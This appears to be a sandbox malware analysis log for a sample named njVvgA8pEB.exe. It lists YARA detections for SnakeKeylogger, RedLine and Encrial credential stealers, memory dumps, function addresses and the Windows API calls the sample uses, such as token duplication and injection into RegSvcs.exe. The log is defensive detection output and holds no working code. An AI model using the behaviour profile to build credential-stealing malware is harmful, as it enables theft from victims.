              Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
              Source: 00000003.00000002.4183734715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00313B3A: This is a third-party compiled AutoIt script.
              Source: njVvgA8pEB.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: njVvgA8pEB.exe, 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: njVvgA8pEB.exe, 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
              Source: njVvgA8pEB.exe, 00000002.00000002.1739671212.00000000003C4000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: njVvgA8pEB.exe, 00000002.00000002.1739671212.00000000003C4000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
              Source: njVvgA8pEB.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: njVvgA8pEB.exe, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0037A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00368310: _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_003751BD: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0031E6A0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0033D975
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_003321C5
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_003462D2
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_003903DA
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0034242E
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_003325FA
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0036E616
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_003266E1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0034878F
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00328808
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00390857
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00346844
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00378889
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00350B3B
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0033CB21
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00346DB6
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00326F9E
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00323030
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00333187
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0033F1D9
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00311287
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00331484
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00325520
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00337696
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00325760
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00331978
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00349AB5
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0031FCE0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0033BDA6
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00331D90
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00397DDB
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_0031DF00
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_00323FE0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 0_2_012FA7A0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: 2_2_016BF338
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_011D11A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_011D1439
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_011D1448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_03244950
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_03242F10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_03244F72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_0324EED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 3_2_03242F01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: String function: 0040E1D8 appears 43 times
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: String function: 00338900 appears 42 times
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: String function: 00317DE1 appears 35 times
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe, Code function: String function: 00330AE3 appears 70 times
              Source: njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003C0D000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000000.00000003.1719705740.0000000003A63000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCloudServices.exe< vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000002.00000003.1730428811.0000000003E53000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003FFD000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCloudServices.exe< vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.njVvgA8pEB.exe.ff0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.njVvgA8pEB.exe.1400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
